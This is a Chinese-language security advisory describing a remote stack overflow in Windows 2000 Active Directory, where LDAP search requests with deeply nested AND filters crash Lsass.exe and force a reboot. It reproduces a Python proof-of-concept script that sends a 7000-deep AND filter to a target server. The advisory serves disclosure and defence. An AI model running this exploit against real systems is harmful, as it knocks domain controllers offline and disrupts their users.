活動目錄遠程堆棧溢出缺陷

涉及程序：Win2k Active Directory
    描述：Microsoft Windows 活動目錄遠程堆棧溢出缺陷
    詳細：Windows Active Directory(活動目錄)是Windows 2000結(jié)構(gòu)的重要組件，是Microsoft提供的強大的目錄服務(wù)系統(tǒng)。
    Windows活動目錄的LDAP 3搜索請求功能對用戶提交請求缺少正確緩沖區(qū)邊界檢查，遠程攻擊者可利用此缺陷使Lsass.exe服務(wù)崩潰，觸發(fā)緩沖區(qū)溢出。
    通過活動目錄提供的目錄服務(wù)基于LDAP協(xié)議和并使用協(xié)議存儲和獲得Active目錄對象?；顒幽夸浿惺褂肔DAP 3的’search request’請求功能存在問題，攻擊者如果構(gòu)建超過1000個"AND"的請求，并發(fā)送給服務(wù)器，可導(dǎo)致觸發(fā)堆棧溢出，使Lsass.exe服務(wù)崩潰，系統(tǒng)會在30秒內(nèi)重新啟動。
    攻擊方法：
    CORE Security Technologies Advisories （advisories@coresecurity.com）提供了如下測試方法：
    下面是一段Python測試腳本：
    class ActiveDirectoryDOS( Ldap ):
    def __init__(self):
    self._s = None
    self.host = ’192.168.0.1’
    self.basedn = ’dc=bugweek,dc=corelabs,dc=core-sdi,dc=com’
    self.port = 389
    self.buffer = ’’
    self.msg_id = 1
    Ldap.__init__()
    def generateFilter_BinaryOp( self, filter ):
    filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
    filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
    return filterBuffer
    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
    simpleBinOp = self.generateFilter_BinaryOp( filter )
    filterBuffer = simpleBinOp
    for cnt in range( 0, numTimes ):
    filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
    return filterBuffer
    def searchSub( self, filterBuffer ):
    self.bindRequest()
    self.searchRequest( filterBuffer )
    def run(self, host = ’’, basedn = ’’, name = ’’ ):
    # the machine must not exist
    machine_name = ’xaxax’
    filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,’name’,machine_name)
    # execute the anonymous query
    print ’executing query’
    filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
    self.searchSub( filterBuffer )